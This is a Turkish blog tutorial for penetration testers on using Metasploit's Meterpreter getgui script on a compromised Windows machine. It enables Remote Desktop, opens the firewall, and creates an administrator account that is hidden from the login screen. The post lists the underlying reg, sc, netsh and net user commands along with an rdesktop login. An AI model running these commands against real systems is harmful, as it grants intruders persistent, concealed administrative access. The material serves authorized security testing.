Windows Bilgisayarda Meterpreter getgui Betiği Kullanılarak Uzak Masaüstü Bağlantısının Etkinleştirilmesi

Sızma testleri sırasından Windows işletim sisteminde yerel yönetici hakları ile Meterpreter bağlantısı elde edildikten sonra, bilgisayarın masaüstü oturumuna geçmek gerekebilir. Bu yazıda, yerel yönetici hakları ile Meterpreter oturumu elde edilmiş Windows bilgisayarda getgui betiği çalıştırılarak masaüstü bağlantısı elde edilecektir.

Mevcut durumda PC adlı Windows bilgisayarda SYSTEM yetkileri ile bir Meterpreter oturumu açılmıştır. Meterpreter oturumunda getgui betiğinin temel kullanımı aşağıdaki gibidir.

sessions
sessions -i 1
run getgui -h

enabling-remote-desktop-connection-on-windows-operating-system-by-using-meterpreter-getgui-script-01

 

Bu bilgisayara uzak masaüstü bağlantısı gerekleştirmek için Meterpreter oturumunda getgui betiği kullanılabilir. Bu betik ile uzak masaüstü bağlantısı etkinleştirilir, Terminal Services adlı servisin başlangıç modu otomatiğe alınır, güvenlik duvarından uzak masaüstü erişimine izin verilir, belirtilen kimlik bilgilerine göre yeni bir yönetici hesabı oluşturulabilir.

run getgui -e -p Aa123456 -u YeniKullanici

enabling-remote-desktop-connection-on-windows-operating-system-by-using-meterpreter-getgui-script-02

Not: Meterpreter “multi_console_command” betiğine kaynak dosyası olaran Meterpreter “getgui” betiğinin çıktısında belirtilen dosya verildiğinde oluşturulan yeni hesap silinebilir.

Not: Eğer işletim sisteminde uzak masaüstü bağlantısı gerçekleştirebilecek bir kullanıcı hesabına ait kullanıcı adı ve parola biliniyorsa yeni bir kullanıcı adı ve parola (YeniKullanici / Aa123456) belirtmeye gerek yoktur.

Böylece masaüstü bağlantısı sağlanmış olur.

rdesktop -r:disk=/tmp -u YeniKullanici -p Aa123456 192.168.74.138

enabling-remote-desktop-connection-on-windows-operating-system-by-using-meterpreter-getgui-script-03

 

Bu betik ile yapılan işlemler özet ile aşağıdaki gibidir.

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config termservice start= auto
sc start termservice
netsh firewall set service type = remotedesktop mode = enable
net user YeniKullanici Aa123456 /add
reg add “HKLM\SOFTWARE\Microsoft\Windows\ NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v YeniKullanici /t REG_DWORD /d 0 /f
net localgroup “Remote Desktop Users” YeniKullanici /add
net localgroup “Administrators” YeniKullanici /add

 

Kaynak:

https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/getgui.rb

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.